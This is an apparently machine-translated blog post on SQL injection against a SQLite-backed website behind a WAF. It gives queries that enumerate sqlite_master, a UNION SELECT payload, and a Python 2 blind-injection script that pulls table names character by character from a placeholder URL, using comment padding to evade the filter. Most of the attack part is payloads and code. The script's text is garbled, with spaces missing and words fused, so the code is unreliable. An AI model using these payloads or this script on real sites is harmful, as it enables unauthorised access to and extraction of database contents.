SQLite injection Test

Testing a website is a SQLite database, also equipped with a security dog, bypassing the protection, find payload, wrote a python script to stopwatch, here summarizes:

Get all the table names in the SQLite database

The query Table,type segment is ' table ', the Name field is the names of the table,

So:select name from Sqlite_master where type= ' table ' order by name;

Query a record: select name from Sqlite_master where type= ' table ' ORDER by name limit 0,1

Sqlite_version (*) returns the version of SQLite

Similar to mysql5.x, does SQLite exist similar to information_schema? A table, which is not displayed by default, is named Sqlite_master, and the fields in the table are Type,name,tbl_name,rootpage,sql,? The more valuable is the SQL field

Union Select 1,sql,2,3 from Sqlite_master

#! /usr/bin/Env python# _*_ coding:utf-8_*_import urllibimport urllib2payloads='[Email protected]_.abcdefghijklmnopqrstuvwxyz'Header= {'user-agent':'mozilla/4.0 (compatible; MSIE 5.5; Windows NT)'} values={}print'Start to retrive User:'User="' forIinchRange1, the):     forPayloadinchpayloadsvalues['fromcity']="xxx'/**a*/and/**a*/"+"substr (select name from Sqlite_master where type= ' table ' ORDER by name limit 0,1),%s,1) = '%s '--"%(I,STR (payload)) data=urllib.urlencode (values) URL="http://www.xxxx.com/xxxx.aspx"Geturl= url+'?'+Data Request= Urllib2. Request (geturl,headers=header) Response= Urllib2.urlopen (request,timeout=5) Result=response.read () print'.',        ifResult.count ('HO1110') >0: User+=Payload Print'\n\n[in Progress]', user, BreakPrint'\n\n[done] User is%s'% User

Reference article:

Php/sqlite Common Vulnerability Analysis: http://www.2cto.com/Article/201410/342032.html

SQLite injection Test